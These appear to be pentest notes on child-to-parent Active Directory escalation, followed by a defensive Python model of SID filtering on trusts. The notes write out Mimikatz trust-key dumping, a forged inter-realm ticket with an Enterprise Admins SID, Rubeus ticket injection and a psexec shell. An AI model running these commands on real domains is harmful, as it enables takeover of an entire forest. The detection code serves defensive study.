Child-to-Parent CIFS
For the long version, refer to this article. Refer to Trusted - Vulnlab for an example.
To get the Domain SID:
lsadump::trust /patch
Then


Use the SID and rc4 hash:
Kerberos::golden
/user: Administrator
/domain: dollarcorp.moneycorp.local [child_domain]
/sid: DomainAdmin_SID [-512]
/sids: Enterprise_Admin_SID [519]
/rc4: Ticket HASH
/service:krbtgt
/target:moneycorp.local [root domain]
/ticket: location to save the ticket
Now use Rubeus to get a TGS:
Rubeus.exe asktgs
/ticket: ticket Location
/service: service type [cifs/mcorpdc.moneycorp.local]
/dc: domain controller [mcorp-dc.moneycorp.local]
/ptt
Then, to get a shell:
psexec.py administrator@trusteddc.trusted.vl -k -no-pass
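Why the /sids value above matters to defenders, as an added example that is not part of the original notes: a simplified Python model of SID filtering on a trust. A parent-child trust inside a forest does not filter extra SIDs by default, so a root-domain -519 SID asserted by the child is honored, while a quarantined trust drops every SID that does not belong to the trusted domain. The function names and the SIDs are constructed for illustration.

```python
import re

# Domain-relative SID: S-1-5-21-<three sub-authorities>-<RID>
SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")
ENTERPRISE_ADMINS_RID = 519  # the RID this page passes in /sids


def split_sid(sid):
    """Split a domain-relative SID into (domain_sid, rid)."""
    m = SID_RE.match(sid)
    if m is None:
        raise ValueError(f"not a domain-relative SID: {sid!r}")
    return m.group(1), int(m.group(2))


def review_extra_sids(trusted_domain_sid, extra_sids, quarantine):
    """Model what happens to a ticket's extra SIDs when it crosses a trust.

    trusted_domain_sid: SID of the domain the ticket comes from (the child).
    quarantine: True if SID filtering (quarantine) is enforced on the trust.
    Returns (kept, dropped, alerts); alerts lists Enterprise Admins SIDs
    that were asserted by a domain that does not own them.
    """
    kept, dropped, alerts = [], [], []
    for sid in extra_sids:
        domain_sid, rid = split_sid(sid)
        foreign = domain_sid != trusted_domain_sid
        if foreign and rid == ENTERPRISE_ADMINS_RID:
            alerts.append(sid)
        (dropped if foreign and quarantine else kept).append(sid)
    return kept, dropped, alerts


if __name__ == "__main__":
    # Constructed SIDs, not taken from any real domain.
    child = "S-1-5-21-1111111111-2222222222-3333333333"
    root = "S-1-5-21-4444444444-5555555555-6666666666"
    extra = [f"{child}-1105", f"{root}-519"]
    for quarantine in (False, True):
        kept, dropped, alerts = review_extra_sids(child, extra, quarantine)
        print(f"quarantine={quarantine}: kept={kept} dropped={dropped} alerts={alerts}")
```

The alerts list is the review signal in both cases: an Enterprise Admins SID carried in a ticket issued by a domain that does not own that SID.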